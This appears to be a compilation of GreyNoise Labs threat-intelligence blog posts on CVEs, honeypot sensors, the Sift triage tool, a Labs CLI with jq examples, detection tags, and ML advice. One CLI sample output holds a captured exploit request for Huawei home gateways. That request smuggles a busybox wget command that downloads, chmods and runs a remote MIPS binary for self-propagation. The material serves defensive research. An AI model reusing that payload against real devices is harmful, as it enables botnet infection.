  • The exploitation of this vulnerability depends on the specific implementation of Apache Struts2 in a vendor's product and the defined actions' path.

In the coming weeks, GreyNoise and the extended research community are expected to investigate vendor and product-specific implementations leveraging Apache Struts2 to determine the exact path that must be traversed to drop a web shell in those products and call it remotely through a public interface over the defined routes.

Using GreyNoise EAP Sensors For Novel Exploitation Discovery For CVE-2023-47246

In a new GreyNoise Labs’ blog post, researcher Jacob Fisher (a.k.a. h0wdy) explored the use of our new Early Access Program (EAP) dynamic sensors to catch a new proof of concept (PoC) for CVE-2023-47246 — a path traversal vulnerability leading to remote code execution (RCE) in SysAid On-Premise software.

In it, Jacob discusses the importance of reactive honeypots/sensors for obtaining accurate and comprehensive packet captures, along with his methodology for digging into the gory details of real-world service exploitation. This work helped create our new tag for this exploit.

Discover how dynamic honeypots can help you stay ahead of emerging threats, and learn from Jacob’s experience with this novel vulnerability.

CVE-2023-49103: ownCloud Critical Vulnerability Quickly Exploited in the Wild

2023-11-30 UPDATE

Ron Bowes of the GreyNoise Labs team has made some updates to the deep dive into this critical vulnerability in ownCloud’s Graph API.

2023-11-29 UPDATE

Ron Bowes of the GreyNoise Labs team has put together a deep dive into this critical vulnerability in ownCloud’s Graph API. Ron discusses the exploit, its impact on Docker installations, and our comprehensive testing process, here at GreyNoise.


2023-11-27 ORIGINAL POST

On November 21, 2023, ownCloud publicly disclosed a critical vulnerability with a CVSS severity rating of 10 out of 10. This vulnerability, tracked as CVE-2023-49103, affects the "graphapi" app used in ownCloud. 

ownCloud is a file server and collaboration platform that enables secure storage, sharing, and synchronization of commonly sensitive files.

The vulnerability allows attackers to access admin passwords, mail server credentials, and license keys. 

GreyNoise has observed mass exploitation of this vulnerability in the wild as early as November 25, 2023.

The vulnerability arises from a flaw in the "graphapi" app, present in ownCloud versions 0.2.0 to 0.3.0. This app utilizes a third-party library that will reveal sensitive PHP environment configurations, including passwords and keys. Disabling the app does not entirely resolve the issue, and even non-containerized ownCloud instances are at risk. Docker containers before February 2023 are not affected. 

Mitigation information listed in the vendor's disclosure includes manual efforts such as deleting a directory and changing any secrets that may have been accessed.

In addition to CVE-2023-49103, ownCloud has also disclosed other critical vulnerabilities, including an authentication bypass flaw (CVE-2023-49105) and a critical flaw related to the oauth2 app (CVE-2023-49104). 

Organizations using ownCloud should address these vulnerabilities immediately. 

Quickly Triaging HTTP Traffic From GreyNoise’s New Hosted Sensors

Our new hosted sensor fleet is cranking out PCAPs for those lucky folks who made it into the first round of our Early Access Program. These sensors enable you to give up a precious, internet-facing IPv4 address and have it automgically wired up to your choice of persona. These personas can be anything from a Cisco device, to a camera, and anything in between.

While there’s a fancy “PCAP analyzer” feature “coming soon” to the GN Visualizer and API, I’ve been mostly using a sensor that’s tucked away in a fairly quiescent part of the internet to quickly triage HTTP requests to see if we can bulk up our Tag (i.e., an attack/activity detection rule) corpus with things we may have missed in the sea of traffic we collect, tag, and triage every day.

Sure, Sift helps quite a bit with identifying truly horrific things, but occasionally a quick human pass at HTTP paths, headers, and POST bodies will either identify something we may have previously missed, or cause us to think a bit differently and start identifying more of the noise. This is how our recent “security.txt scanner 🏷️” and robots.txt scanner 🏷️ were birthed.

We've posted a detailed write-up on one way to do this over on the GreyNoise Labs Grimoire. Check it out and share your analyses or alternate ways you processes thse PCAPs in the Community Slack!

Introducing Sift: Automated Threat Hunting

TLDR:

GreyNoise is exposing a new internally developed tool, Sift, to the public for the first time. Sift curates a report of new/interesting traffic observed by GreyNoise sensors daily after doing much of the analysis and triage work itself.

Note that it is a new and experimental feature and will probably have some bugs and change without warning. We will soon be integrating direct marker.io feedback capability. For now, please direct all feedback to labs@greynoise.io. We really want to know what you think!

Figure 1: Example Sift Report

Threat Hunter Pain

There is a lot of traffic bouncing around the internet. Full stop. GreyNoise sees ~2 million HTTP requests (along with tens of millions of events from other protocols) a day. For our on-staff Detection Engineers and your engineers and analysts facing similar loads, analyzing millions of HTTP requests can be extremely tiresome and stressful. 

It’s like looking for a needle in a haystack each day. Most of them are harmless, but some could be hiding malicious activity. It’s a tedious and time-consuming process, constantly payloads of data, and the fear of overlooking something dangerous adds a layer of stress. The task is mentally exhausting, and the perpetual strain can make it a painful experience, with the constant awareness that a single mistake could have serious consequences.

Introducing Sift

To help provide a painkiller, we’ve created Sift. Sift is a workflow that attempts to remove the noise of the background traffic and expose new and relevant traffic. Additionally, it describes the interesting traffic, tells you if it might be a threat, and prioritizes what payloads to look at first. Identification, explanation, and triage all in one tool. 

To achieve this, we employ several advanced DS/ML/AI techniques, such as:

  • custom-built LLMs (Large Language Models)
  • nearest neighbor search and vector databases
  • unsupervised clustering, prompt engineer
  • RAG (Retrieval Augmented Generation), and 
  • querying the state of the art generative models for additional analysis.

The result is a daily report of what GreyNoise sees in our vast sensor network distilled down to only the new items and with built-in analysis to give every defender an immediate look into what is really happening on the internet, no longer needing the luck of an analyst stumbling upon an attack in log traffic.

Currently, it is limited to HTTP traffic, but that won’t last long. It is an experimental feature on the bleeding edge of what is possible, so please bear with us as errors inevitably occur.

Directing Attention

As said earlier, GreyNoise sees millions of HTTP requests a day. After months of experimentation, we found several techniques to record, clean, dedupe, and convert this data into a numerical format for analysis. Applying this to our significant dataset of internet traffic, we’re able to automatically tell you what is new today vs. what we have seen in the last several weeks. This process effectively makes a noise filter for traffic.

In practice, our process takes ~2 million HTTP events down to ~50 per day that require an analyst to look at. Now, we can actually find the needles in our proverbial haystack scientifically and give our analysts a reasonable workload. This reduction in noise has dramatically improved the quantity of new Tags we can generate every week.

Explaining and Sorting

Once we’ve narrowed our focus, we can employ some of the more costly techniques of commercial large language models to help us answer specific questions about the payloads we’re considering. Without giving away all our techniques of how we accomplish it, we can generate an analysis of the payload, potential CVEs, and CPEs associated (which are more up-to-date than any language model), a score of how big of a threat it might be, what GreyNoise knows about the IPs (tags/riot/etc), a score of how confident we are, Suricata queries that might detect similar payloads, as well as keywords, techniques, and technologies affected.

In short, we’re trying to build an entire analyst report on the fly for only things you should look at. Additionally, we sort the reports, so you look at the most critical threats first.

Future Possibilities

Sift is brand new and full of possibilities. You can help flesh those out. We’re currently only exposing daily reports from the last month (excluding the previous week). 

  • Would you like to see more reports? (e.g., Back in time or up to the current date?)
  • More tailored to your organization? (We are rolling out user-hosted sensors where you can get data that a Sift report could eventually filter. More info to come soon..)
  • Would you submit a PCAP to get a Sift report on it?
  • Is there other information you’d want in a report?

Welcome to GreyNoise Labs!

As autumn quickly approaches in the Northern Hemisphere, many people see this as a time to turn inward and prepare for the long winter ahead. However, this is also a time when the lush, uniform green flora around us transforms into a kaleidoscope of colors. This change helps give us all a renewed perspective on what is all around us and fuels both an appreciation for what we have and creativity for what is possible.

Today, GreyNoise is excited to officially announce the emergence of GreyNoise Labs. Keen-eyed GreyNoise users may have noticed our soft launch of this throughout 2023.

Now, like the autumn leaves, we're adding even more color to the existing knowledge and insight that GreyNoise already provides, which governments, critical infrastructure, Fortune 100 enterprises, and security researchers rely on daily to help defend us all against cyberattacks.

What can you expect from GreyNoise Labs?

You already know one of our goals: to provide early access to new data, tools, and insights we're developing — things that may eventually become integrated into our core product but need testing, feedback, and real-world use.

All the teams at GreyNoise provide product, company, community, and emerging threat information via our primary communication channel. This is still the place to keep your finger on the pulse of what's happening at GreyNoise and in the internet threat landscape. If our GreyNoise blog's RSS feed still needs to be added to your favorite newsreader, we highly recommend adding it right now!

That is still the place where critical, actionable information associated with emerging threats will first be published. However, we often need to go deeper into a particular vulnerability or exploit. We also have much more to say on security research projects we're undertaking, data science initiatives we're investigating, and cutting-edge detection engineering concepts we're pioneering.

Our new Grimoire blog (Grimoire RSS) is the place for these deeper dives. We'll make sure to link to them if we have more to say about any emerging threats we direct your attention to on the core blog.

The GreyNoise Labs API is part of our internal Blueprints initiative. Our Product, Design, and Engineering teams build, maintain, and enhance resilient and robust systems/applications you rely on daily. Our Labs team is charged with developing new ways to process and present the data we collect, curate, and compute. These ideas are codified into "blueprints," which are — by definition – "something intended as a guide for making something else." These may take the form of a new Labs API or greynoiselabs command line endpoint, alternate ways to view our data, different idioms for interacting with our core services, or just ways to help you see how we think about the data we work with.

We'll also be regularly updating resources we rely on and giving folks a bit more insight into the team behind GreyNoise Labs. Curious about what we do, what we've published, or the APIs we've made available? Drop us a note at labs@greynoise.io.

Fast-Tracking Innovation: GreyNoise Labs Experimental CLI

Introducing the GreyNoise Labs Python CLI package: a robust toolkit for advanced users seeking to maximize the potential of our experimental Labs services.

Cybersecurity data analysis is a complex and rapidly evolving landscape. To stay ahead, power users need tools that offer swift and accurate data handling. That's where the new GreyNoise Labs CLI package comes in. Crafted to optimize the parsing and manipulation of our sensor datasets, this CLI will not only expedite your process but also deliver digestible insights right at your fingertips.

Diving Into The Toolkit

The package serves as a conduit to the GreyNoise Labs API service, facilitating direct access to raw sensor data, contextual metadata, and quick prototyping utilities. This powerful Python package is your key to unlocking a simpler, more efficient interaction with our Labs API.

The GreyNoise Labs API contains the top 1% of data for all queries. However, the fluid nature of our continuous iteration and experimentation means that queries and commands can change without prior notice, and a rate limit is in place for equitable usage. While these utilities are primarily intended for us to explore new concepts and gather valuable user feedback, you're welcome to use them. We do caution against integrating them directly into production tools.

Our objective is to identify and prioritize new product features through these experimental iterations and your feedback. This exploratory process allows us to deliver features that not only cater to your specific needs, but also seamlessly integrate with our products.

For more insight into GreyNoise Labs and the work we're doing, visit our official website.

Installing ‘greynoiselabs’

The CLI installation process is straightforward:

  1. Run python3 -m pip install greynoiselabs
  1. Run greynoiselabs init to authenticate with Auth0 (what we use for secure authentication for your GreyNoise account) and save your credentials for future use.

As an optional step, we recommend installing jq to enhance the readability of CLI output. You can install jq with brew install jq on macOS or apt-get install jq on Ubuntu.

Quick Start Guide

Once installed, you can explore the features of the CLI by running greynoiselabs, which provides a handy usage guide.

image showing output of running greynoiselabs without options

Furthermore, you can access command-specific help using greynoiselabs <command> --help.

image showing help for greynoiselabs knocks

These commands can help you explore a variety of rich datasets released by GreyNoise Labs. Remember, the data is easily parseable with jq, which can help you extract insights and filter results to suit your specific needs. Some examples of jq usage are provided later on.

# This gives a JSON response containing data about specific source IPs.
greynoiselabs c2s | jq

{
  "source_ip": "1.2.3.4",
  "hits": 2024,
  "pervasiveness": 10,
  "c2_ips": [
    "5.6.7.8"
  ],
  "c2_domains": [],
  "payload": "POST /ctrlt/DeviceUpgrade_1 HTTP/1.1\r\nContent-Length: 430\r\nConnection: keep-alive\r\nAccept: */*\r\nAuthorization: Digest username=\"dslf-config\", realm=\"HuaweiHomeGateway\", nonce=\"88645cefb1f9ede0e336e3569d75ee30\", uri=\"/ctrlt/DeviceUpgrade_1\", response=\"3612f843a42db38f48f59d2a3597e19c\", algorithm=\"MD5\", qop=\"auth\", nc=00000001, cnonce=\"248d1a2560100669\"\r\n\r\n…$(/bin/busybox wget -g 5.6.7.8 -l /tmp/negro -r /.oKA31/bok.mips; /bin/busybox chmod 777 /tmp/negro; /tmp/negro hw.selfrep)…\r\n\r\n"
}
# This command provides insights into knocks on specific source IPs.
greynoiselabs knocks | jq
{
  "source_ip": "36.70.32.117",
  "headers": "{\"Content-Type\":[\"text/html\"],\"Expires\":[\"0\"],\"Server\":[\"uc-httpd 1.0.0\"]}",
  "apps": "[{\"app_name\":\"Apache HTTP Server\",\"version\":\"\"}]",
  "emails": [],
  "favicon_mmh3_128": "Sgqu+Vngs9hrQOzD8luitA==",
  "favicon_mmh3_32": -533084183,
  "ips": [
    "10.2.4.88",
    "10.2.2.88"
  ],
  "knock_port": 80,
  "jarm": "00000000000000000000000000000000000000000000000000000000000000",
  "last_seen": "2023-07-21T11:00:06Z",
  "last_crawled": "2023-07-22T00:14:27Z",
  "links": [],
  "title": "NETSurveillance WEB",
  "tor_exit": false
}
# This shows the most popular IPs.
greynoiselabs popular-ips | jq
{
  "ip": "143.244.50.173",
  "request_count": 916,
  "users_count": 95,
  "last_requested": "2023-07-27T23:55:17Z",
  "noise": true,
  "last_seen": "2023-07-27T23:59:11Z"
 }
# This allows you to see the noise ranking of a specific IP.
greynoiselabs noise-rank | jq
{
  "ip": "167.94.138.35",
  "noise_score": 89,
  "country_pervasiveness": "very high",
  "payload_diversity": "med",
  "port_diversity": "very high",
  "request_rate": "high",
  "sensor_pervasiveness": "very high"
}
# This uses a GPT prompt to generate different results on each run.
greynoiselabs gengnql "Show malicious results that are targeting Ukraine from Russia"

classification:malicious AND metadata.country:Russia AND destination_country:Ukraine
    metadata.country:Russia AND destination_country:Ukraine AND classification:malicious
    metadata.country_code:RU AND destination_country_code:UA AND classification:malicious
    classification:malicious AND metadata.country_code:RU AND destination_country_code:UA
    destination_country:Ukraine AND metadata.country:Russia AND classification:malicious

Advanced Usage

jq is a versatile tool for handling JSON data from the command line. Here are a few examples using the JSON outputs above that could provide some interesting insights. Note that these examples are based on the provided samples and may need to be adjusted based on the actual structure and content of your data.

Get a count of all unique C2 IPs

If you wanted to see how many unique C2 IPs exist in your dataset, you could run:

greynoiselabs c2s | \
  jq -s '[.[].c2_ips[]] | \
  unique | \
  length'
149


which retrieves all the C2 IPs (.[].c2_ips[]), finds the unique values (unique), and then counts them (length).

Identify IPs with high hit counts

If you're interested in the source IPs with high hit counts, you could use a command like:

greynoiselabs c2s | \
  jq 'select(.hits > 1000) |\
  .source_ip'
"141.98.6.31"
"194.180.49.165"
"45.88.90.149"
"59.7.196.80"
"61.78.140.229"
"211.194.241.110"
"121.185.173.56"

This filters the data to only include records where the hits are greater than 1000 (select(.hits > 1000)), and then outputs the corresponding source IPs (source_ip).

Grouping by Noise Score

If you wanted to see how many IPs fall into different categories based on their noise score, you could run:

greynoiselabs noise-rank | \
  jq -s 'group_by(.noise_score) | \
  map({noise_score: .[0].noise_score, count: length})'
[
  {
    "noise_score": 40,
    "count": 181
  },
  {
    "noise_score": 41,
    "count": 200
  },
  {
    "noise_score": 42,
    "count": 171
  }
]

This command groups the data by the noise score (group_by(.noise_score)), and then transforms it into an array with each object containing the noise score and the count of IPs with that score (map({noise_score: .[0].noise_score, count: length})).

Identify All Noiseless Popular IPs

If you wanted to see all popular IPs that are not observed by GreyNoise sensors, you could use:

greynoiselabs popular-ips | \
  jq '. | \
  select(.noise == false) | .ip'
"13.107.138.8"
"87.103.240.204"
"91.243.167.69"
"13.107.136.8"
"204.79.197.200"
"194.145.175.59"
"52.113.194.132"
"189.95.160.50"

This command filters the data to only include records where the noise is false (select(.noise == false)), and then outputs the corresponding IPs (ip).

Aggregate KnockKnock Source IPs by HTTP Title

For a glimpse into the distribution of page titles across your network traffic, use.

greynoiselabs knocks | \
  jq -s 'map(select(.title != "")) | \
  group_by(.title) | \
  map({title: .[0].title, source_ips: map(.source_ip), ip_count: length}) | \
  sort_by(-.ip_count)'
[
  {
    "title": "RouterOS router configuration page",
    "source_ips": [
      "103.155.198.235",
      "185.99.126.15",
   …
      "103.58.251.213"
    ],
    "ip_count": 81
  },
  {
    "title": "main page",
    "source_ips": [
      "220.84.204.83",
      "118.37.197.253",
     …
      "119.200.155.99"
    ],
    "ip_count": 58
  },
 …
]]

This command does the following:

  • map(select(.title != "")): Filters out the objects that have an empty title.
  • group_by(.title): Groups the remaining objects by their title.
  • map({title: .[0].title, source_ips: map(.source_ip), ip_count: length}): Transforms the grouped data into an array of objects, each containing a title, an array of associated source IPs, and a count of those IPs (ip_count).
  • sort_by(-.ip_count): Sorts the array of objects based on the ip_count in descending order.

By grouping the 'knocks' data based on the title, this updated command allows you to quickly identify which titles have the most associated source IPs. The result is sorted by the ip_count field, giving you an ordered view from most to the least associated IPs for each title.

The Power Of Data

Finally, with this, you can start to see the power of this data. The first result is a list of IPs likely running Mikrotik routers, that are scanning and crawling the internet and likely related to one or more botnets. Our knockknock dataset has a bunch of granular signature information that could be used to further identify clusters of similar IPs. We will have more on this in a future blog post.

These are just a few examples of what you can do with jq and the new GreyNoise Labs CLI output data. By adjusting these examples to your needs, you can glean a multitude of insights from your data and ours.

As we continue to evolve and expand the functionality of the GreyNoise Labs API and CLI, we are eager to hear your feedback. Your input is critical in helping us understand which features are most valuable and what other capabilities you'd like to see included.

Please don't hesitate to reach out to us with your feedback, questions, or any issues you may encounter at labs@greynoise.io. Alternatively, you can also create an issue directly on our GreyNoise Labs GitHub page. If you have ideas about ways to combine our data into a more useful view or are interested in somehow partnering with a dataset you have, please reach out.

We can't wait to see what you'll discover with the GreyNoise Labs CLI. Get started today and let us know your thoughts!

While our Labs API data is spiffy, you, too, can take advantage of our core data science-fueled threat intelligence platform to identify noise, reduce false positives, and focus on genuine threats. Sign up for GreyNoise Intelligence today and gain the edge in protecting your systems.

Data Science-Fueled Tagging From GreyNoise Last Week

All our tags come from extremely talented humans who painstakingly craft detection rules for emergent threats that pass our “100%” test every time. We tend to rely on research partner shared proof-of-concept (PoC) code or vendor/researcher write-ups to determine when we should direct our efforts. Sometimes, prominent, emergent CVEs will cause us to dig into the patch diffs ourselves, fire up vulnerable instances of the software, and determine likely exploit paths which we wait to see are correct.

However, we receive millions of just HTTP/HTTPS events every single day. Deep within that noise we know that exploitation attempts for other services exist, but surfacing ones that may matter is a challenge since we're only human. Thankfully, we also spend some of our time on data science projects that help fuel innovation. You've seen the results of those efforts in our IP Sim and Tag Trends platform features. But, we have many internal data science projects that are designed to give our researchers bionic tagging powers; enabling each of them to be stronger, better, and faster when it comes to identifying novel traffic and understanding whether it is malicious or not (and, whether it warrants a tag).

One of these tools is “Hunter” (yes, the Labs team is quite unimaginative when it comes to internal code names). It performs a daily clustering of HTTP/HTTPS traffic, sifting through those millions of events, and surfaces a very manageable handful of clusters that our dedicated team can easily and quickly triage. Hunter also has a memory of past clusters, so it will only surface “new” ones each day.

Last week was bonkers when it comes to the number of tags (7) our team cranked out.

One reason for that Herculean number is due to Hunter! It led us down the path to finding activity that we might have otherwise only tagged in the future when organizations or agencies announced exploit campaigns that did real harm to those who fell victim to attack.

In the tag round-up for last week, below, we note where Hunter was the source for the creation of the tag with a “🔍”.

A trio of tags for SonicWall

SonicOS TFA Scanner 🔍

The SonicOS TFA Scanner tag identifies IP addresses scanning for the SonicWall SonicOS Two Factor Authentication (TFA) API endpoint. So far, we've observed 503 unique IP addresses from benign scanners searching for this endpoint. For more information and to explore the data, check out the GreyNoise Visualizer for SonicOS TFA Scanner.

SonicWall Auth Bypass Attempt

This tag is related to IP addresses attempting to exploit CVE-2023-34124, an authentication bypass vulnerability in SonicWall GMS and Analytics. No exploit attempts have been observed so far. For more details, visit the GreyNoise Visualizer entry for SonicWall Auth Bypass Attempt.

SonicWall SQL Injection Attempt

We've observed one malicious IP address attempting to exploit CVE-2023-34133, a SonicWall SQL Injection vulnerability. So far, we've seen one IP — 94[.]228[.]169[.]4 poking around for vulnerable instances. — To learn more about this tag and the associated data, have a look at the GreyNoise Visualizer entry for SonicWall SQL Injection Attempt.

A dastardly dynamic duo for Ivanti

Ivanti MICS Scanning

This tag is associated with IP addresses scanning for Ivanti MobileIron Configuration Services (MICS). As of now, we haven't seen any IPs attempting to exploit this vulnerability. To dive deeper into this tag, visit the GreyNoise Visualizer for Ivanti MICS Scanning.

Ivanti Sentry Auth Bypass Attempt

IP addresses with this tag have been observed attempting to exploit CVE-2023-38035, an authentication bypass vulnerability in Ivanti Sentry, formerly known as MobileIron Sentry, versions 9.18 and prior. No exploit attempts have been observed to date. Explore this tag further on the GreyNoise Visualizer entry for Ivanti Sentry Auth Bypass Attempt.

Solo tags

Openfire Path Traversal Attempt activity

IP addresses with this tag have been observed attempting to exploit CVE-2023-32315, a path traversal vulnerability in Openfire's administrative console. We've caught seven IPs attempting to find paths they should not be. You can check those out at the GreyNoise Visualizer entry for Openfire Path Traversal Attempt

TBK Vision DVR Auth Bypass activity 🔍

Finally, IP addresses with this tag have been observed attempting to exploit CVE-2018-9995, an authentication bypass vulnerability in TBK DVR4104 and DVR4216 devices. Looking back at the past 30 days of data, we found 66 IPs looking for these streaming systems. You can find them all at the GreyNoise Visualizer entry for TBK Vision DVR Auth Bypass

So What?

The earlier we can find and tag new, malicious activity, the more quickly our customers and community members can take advantage of our timely threat intelligence to either buy time to patch systems and block malicious activity.

You, too, can take advantage of our data science-fueled threat intelligence platform to identify noise, reduce false positives, and focus on genuine threats. Sign up for GreyNoise Intelligence today and gain the edge in protecting your systems.

Do you have a tag that you want GreyNoise to look into? You are in luck! We now have a page for our Community to request a tag. Check it out.

How to Create Actionable Intelligence with AI and Machine Learning

AI/ML and cybersecurity go together like peanut butter and bananas. You might not think it’s a fit, but it can work out great if you’re into it.

I recently did a talk with Centripetal and wanted to share some highlights as well as the entire video below. This covers a few themes, such as: “how has ML been used in cybersecurity in the past”, “what are the problems with it”, “why we need to use it”, “how to use it responsibly”, and “what to do with all these GPTs”.

If you’re interested in watching it in full, here is the talk.

ML In Security

One of the first use cases for ML in security was spam filtering in early email clients in the late 90s. This was a simple bag of words + a naive Bayes model approach, but has gotten much more complicated over time. 

More recently, ML has been used to build malware detection models. Almost all anti-malware processors in VirusTotal have some ML component.

It has also been used in outlier detection (determining spikes in logs/alerts/traffic) and in rule or workflow generation.

What’s The Problem?

However, it’s not all sunshine, roses, and solved problems. ML has some trust issues, especially when it comes to cybersecurity. Models are never perfect and can create False Negatives and False Positives. 

False Negatives are when we do not detect something as bad when it is indeed bad—it’s a miss. This has obvious problems of allowing something malicious to act on your system/network without your knowledge. 

False Positives are when we call a non-malicious thing bad. This can be just as big of a issue, as it creates unnecessary alerts, leading to alert fatigue, and ultimately leading to ignored alerts which allows actual malicious activity to slip through the cracks.

Cybersecurity has a very low tolerance for both types of errors, and therein lies the issue. ML solutions have to be very, very good at detection without creating too much noise. They also have to provide context for why the ML tool made its determination. 

Why Bother?

It might seem like a pain to use complicated tools like ML/AI, but the brutal truth is that we have to. There is too much data to work through. GreyNoise sees over 2 million unique HTTP requests a day, and that’s just one protocol.

Plus, bad actors aren’t slowing down. Verizon’s DBIR recorded 16k incidents and 5k data breaches last year, and that is merely what is reported. There are ~1,000 Known Exploited Vulnerabilities (CISA) floating around (side note: GreyNoise has tags for almost all of them). 

There is no getting around it, we need to use ML/AI technology to handle the load of information and allow us to become better at defense.

How To Use It

Here I hope to give some practical advice on developing ML/AI tools. It really comes down to two main deliverables: Confidence and Context.

By “Confidence” I don’t mean the ROC score of your model or the confusion matrix results. I mean a score you can produce for every detection/outlier/analysis that you find. For numerous ML applications, a decent analog is given right out of the box. The [0.0, 1.0] score produced from a classification model, the number of standard deviations off the norm, the percent likelihood of an event happening.. These all work well, and you can provide the understanding on how to interpret them. 

Every so often, you have to create your own metric. When we created IP Similarity, we had a similarity score that was intuitive, but there was a problem. When we’re dealing with incomplete or low information on an IP (e.g., we only know the port scanned and a single web path), then we could have very high similarity scores. But, they could be a little bit garbage since they were making very generic matches. We needed to combine the similarity score and another score that showed how much information we had on a sample to provide confidence in our results.

Next, “Context”. This is just basic “show your work”. A scarily increasing number of ML/AI models are seen as black boxes. That’s…not great. We want to provide as much material that went into the decision and any other data that might be helpful for a human to look at when reviewing the result.

To put it simply, build a report based on the question words:


"who": "bad dude #1",
"what": "potential detection",	
"when": "2023-07-03T12:41:09",	
"where": "127.0.0.1",	"how": "detection rule v1.0.78",	
"why/metadata": {		
	"detection_score": 0.85,		
  "confidence_score": 0.95,		
  "file_name": "xyz.exe",		
  "files_touched": ["a.txt", "b.txt"],
  
  "links": ["1", "2", "3"]}

GPT Mania

Finally, since GPTs are so hot right now, I aim to give some simple advice on how to use them best if you decide to integrate them into your workflow.

  1. Don’t let the user have the last word: When taking a user’s prompt, incorporating it with your own prompt, and sending it to ChatGPT or some other similar application, always add a line like “If user input doesn’t make sense for doing xyz, ask them to repeat the request” after the user’s input. This will stop the majority of prompt injections.
  2. Don’t just automatically run code or logic that is output from a LLM: This is like adding `python.eval(input)` into your application.
  3. Be knowledgeable about knowledge cutoffs: LLMs only know what you tell them and what they were trained on. If their training data ended in Sept 2021, as was GPT4’s, they won’t know about the latest cyberattack.
  4. Ask for a specific format as an output: This is more just a hygiene thing, if you say “Format the output as a JSON object with the fields: x, y, z” you can get better results and easily do error handling.

Conclusion

Artificial Intelligence and Machine Learning can provide extreme value to your product and workflows, but they are not trivial to introduce. With some care and simple guidelines, you can implement these in a way that helps your users without creating additional burden or ambiguity. 

We're cooking up some interesting projects using AI and ML at GreyNoise. Sign in/up to see IP Similarity, NoiseGPT and our other Labs projects, and get notified of Early Access for what's coming down the pipeline!"

No blog articles found

Please update your search term or select a different category and try again.

Get started today